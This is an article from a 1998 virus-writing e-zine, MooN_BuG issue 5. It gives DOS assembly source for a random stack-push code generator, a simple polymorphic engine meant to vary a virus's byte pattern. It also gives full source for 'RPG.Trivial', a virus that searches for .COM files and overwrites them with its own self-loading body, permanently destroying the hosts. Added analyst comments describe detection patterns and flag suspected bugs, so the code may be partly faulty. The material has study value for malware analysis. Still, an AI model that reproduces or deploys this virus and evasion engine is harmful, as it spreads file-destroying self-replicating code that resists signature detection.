[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 5, May 1998 file 00C
··Random·Push·Generator·0.1··
·····························
·Most·useless·generator·:)···
·····························
·If·you·want·to·use·it:······
·····························
·don't·forget·about·offset!··
·····························
·bye.·FRiZER·················
·····························
·PS:·it's·not·my·idea·;)·····
·····························
Прочитал в AVP-weekly описание вируса Pusher и решил по его мотивам сделать
свой энджин. Ниже то, что из этого получилось, и пример его использования.
=== Cut ===
;┌[ Random Push Generator ]──────────[ v0.1 ]┐
;■ Input : CX - code length │
;│ : DS:SI - code to convert │
;│ : ES:DI - space for generated code │
;│ : with (CX * 2 + 2) length │
;■ Output : CX - generated code length │
;│ : AX, SI, DI - destroyed │
;└[ by FRiZER ]──────────────────────[ 1998 ]┘
RPG proc
; Random Push Generator: turns CX bytes of input into a self-loading stub at
; ES:DI.  Each 16-bit input word becomes the pair
;     mov rw,imm16 / push rw      (rw = random 16-bit register, never SP)
; emitted from the LAST input word to the FIRST, and the stub ends in jmp sp,
; so after the pushes the stack holds the original bytes in forward order and
; execution continues inside them.  The register index is taken from I/O port
; 40h, so the byte pattern varies between runs while the immediates carry the
; original code unchanged.
; Analyst note: the stable features are the 4-byte period of
; B8..BF (never BC) / imm16 / 50..57 (never 54) ending in FF E4 (jmp sp).
; Calling convention detail not stated in the header: DS:SI must point at the
; LAST word of the input (the sample caller passes start+CX-2) because the
; loop walks backwards (sub si,4 after movsw).
; NOTE(review): for odd CX the loop runs (CX+1)/2 times, the first read
; covers one byte past the end of the input, and the output is CX*2+4 bytes,
; two more than the header above advertises.
cld                     ; forward string ops: movsw/stosb advance SI/DI
push di                 ; remember start of output; used for the length at the end
shr cx,1 ; cx / 2       ; cx = word count ...
jnc RPG_loop
inc cx                  ; ... rounded up when CX is odd ...
inc si                  ; ... and the first word then starts one byte later
RPG_loop:
RPG_rnd:in al,40h       ; random byte from port 40h (PIT channel 0 counter)
and al,07h              ; reduce to a 16-bit register index 0..7
cmp al,04h
je RPG_rnd              ; index 4 = SP: mov sp,imm16 would destroy the stack
cmp al,ah
je RPG_rnd              ; do not reuse the previous register (kept in AH;
                        ; on the first pass AH is whatever the caller left)
mov ah,al               ; remember this register for the next comparison
add al,0B8h ; mov rw,imm16 (rw <> sp) - opcode byte is B8+rw
stosb                   ; emit the mov opcode
movsw                   ; imm16 = the input word itself, copied verbatim
sub si,4                ; movsw advanced SI by 2; net -2 walks the input backwards
or al,0F0h
and al,057h ; push rw   ; (B8+rw | F0) & 57 = 50+rw, the push r16 opcode
stosb                   ; emit the push opcode
loop RPG_loop
mov ax,0E4FFh ; jmp sp  ; bytes FF E4: run the bytes just pushed
stosw
pop cx                  ; cx = start of output
sub cx,di
neg cx                  ; cx = di - start = bytes generated
ret
ver db '[RPG v0.1]'     ; signature string; lies after ret, never executed
RPG endp
=== Cut ===
Пример использования RPG в виде нерезидентного overwrite-вируса.
=== Cut ===
.model tiny
.386
.code
.startup
org 100h
; RPG.Trivial: non-resident COM overwriter demonstrating the engine.
; Layout: m..s is a fixed loader that pushes the body s..e onto the stack
; word by word and jumps there; everything from s on runs from the stack copy
; and reaches its data through the delta z.  For each *.com found, the file is
; rewritten from offset 0 with a freshly generated push-loader for the same
; body, so the loader bytes differ per infection while s..e travels verbatim
; in the imm16 fields.  The victim's leading bytes are replaced and never
; restored; '[RPG.Trivial]' is printed once the directory search is exhausted.
z equ si-113h           ; delta: SI = SP = stack image of s, assumed 13h bytes past
                        ; the COM entry - NOTE(review): hand-counted, confirm
                        ; against the assembled listing of m..s
vs equ e-s              ; body length in bytes
vs2 equ (vs+1)/2        ; body length in words, rounded up
m:
std                     ; lodsw walks backwards: push the last word first
lea si,e-2              ; start at the last word of the body
mov cx,vs
shr cx,1 ; cx / 2       ; cx = word count ...
jnc mloop
inc cx                  ; ... rounded up for odd vs ...
inc si                  ; ... with the first word shifted by one byte
mloop:
lodsw
push ax
loop mloop              ; afterwards SP points at the stack image of s
jmp sp                  ; continue inside the stack copy
s:
mov si,sp               ; si = address of the stack copy of s (base for z)
lea dx,[z+msk]          ; ds:dx -> "*.com"
mov ah,4Eh              ; DOS find-first
mov cx,20h              ; attribute mask: archive
int 21h
jc er                   ; nothing found -> exit path
jmp infect
findnext:
mov ah,4Fh              ; DOS find-next (continues from the default DTA at 80h)
mov dx,80h              ; DX is not an input to 4Fh
int 21h
jc er                   ; no more files -> exit path
infect: mov ax,3d02h    ; open read/write
mov dx,9Eh              ; filename field of the default DTA (80h+1Eh)
int 21h
jc er
xchg ax,bx              ; bx = file handle
mov di,100h             ; es:di = output buffer: the program's own image at 100h
                        ; is free because execution is on the stack copy
mov cx,vs               ; input length
push si di
add si,vs-2             ; ds:si -> last word of the stack copy of the body
call RPG ; cx = length of the generated loader
pop dx si               ; dx = 100h (buffer), si restored
mov ah,40h              ; write cx bytes from the file start (pointer is 0 after open)
int 21h
mov ah,3Eh              ; close
int 21h
jmp findnext
er: mov cx,vs2*2        ; bytes pushed by the loader ...
add sp,cx               ; ... discard the stack copy
mov ah,9
lea dx,[z+msg]
int 21h                 ; print '[RPG.Trivial]'
ret                     ; COM exit: return to PSP:0 (int 20h)
msg db '[RPG.Trivial]',13,10,'$'
msk db '*.com',0
include rpg.inc         ; the engine above; its code is part of the pushed body
e:
end
=== Cut ===